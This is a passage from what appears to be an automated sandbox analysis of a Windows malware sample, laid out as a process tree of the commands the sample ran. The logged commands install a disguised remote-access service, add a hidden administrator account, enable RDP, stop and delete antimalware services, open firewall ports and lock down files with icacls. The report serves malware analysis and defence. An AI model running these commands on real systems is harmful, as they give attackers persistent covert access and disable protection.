      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:964
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2656
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5348
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:3616
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:3320
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        
        PID:5212
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:5160
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:5176
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Modifies registry class
      PID:4440
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        5⤵
        
        PID:4600
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:5792
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:3332
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:864
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        Executes dropped EXE
        
        PID:5384
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:1620
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        Checks computer location settings
        
        PID:1172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        Checks computer location settings
        Modifies registry class
        
        PID:5628
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5276
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4480
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:3732
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:3600
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        Executes dropped EXE
        
        PID:5160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5600
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:5108
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        Checks computer location settings
        
        PID:5168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:4576
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:5600
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:1076
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:392
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:1344
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:4012
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:372
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:4732
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        
        PID:868
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:5264
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        Sets DLL path for service in the registry
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        Modifies Windows Firewall
        
        PID:2868
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        
        PID:5420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:2656
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        10⤵
        
        PID:5804
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        11⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1816
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1796
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5560
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:3404
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5580
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4032
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9727.tmp\9728.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:5852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        8⤵
        Drops file in System32 directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        NTFS ADS
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:4432
      - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        6⤵
        Executes dropped EXE
        
        PID:5304
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        7⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        8⤵
        
        PID:5260
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        6⤵
        
        PID:4784
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        7⤵
        Gathers network information
        
        PID:5584
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        6⤵
        
        PID:5412
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        7⤵
        
        PID:4400
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Creates scheduled task(s)
        
        PID:344
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:3600
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        5⤵
        Drops file in Drivers directory
        
        PID:2376
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2156
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        
        PID:2940
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:3656
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:3476
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5884
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4476
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:5924
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    - Executes dropped EXE
    PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    PID:5124
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      PID:3732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:4480
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      PID:980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    PID:5656
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:2672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    PID:5376
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      PID:2820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:5816
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    PID:1332
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:5780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    PID:3384
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:5440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    3⤵
    PID:5856
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:5808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    PID:4516
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      PID:4048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    PID:3336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      PID:2868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    PID:5600
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:6068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:780
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      PID:5372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      PID:3404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    PID:1096
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      PID:6072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    PID:2552
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:3588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    PID:4040
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      PID:5232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:1020
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:4368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:5060
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      PID:5400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    PID:4840
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:2172
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:3284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:1756
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:3168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    PID:4600
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:2152
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:5768
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:3436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:1812
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:4748
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:5856
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:1108
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:2868
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:6060
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:5248
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:704
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:5584
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    PID:1540
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:3432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    PID:5496
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    PID:5932
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    PID:5360
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:3428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    PID:1828
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:3284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    PID:3064
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      PID:2672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    PID:1332
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    PID:6088
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      PID:5684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    PID:5620
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5072
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    PID:4804
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5868
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:5404
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4048
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1928
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
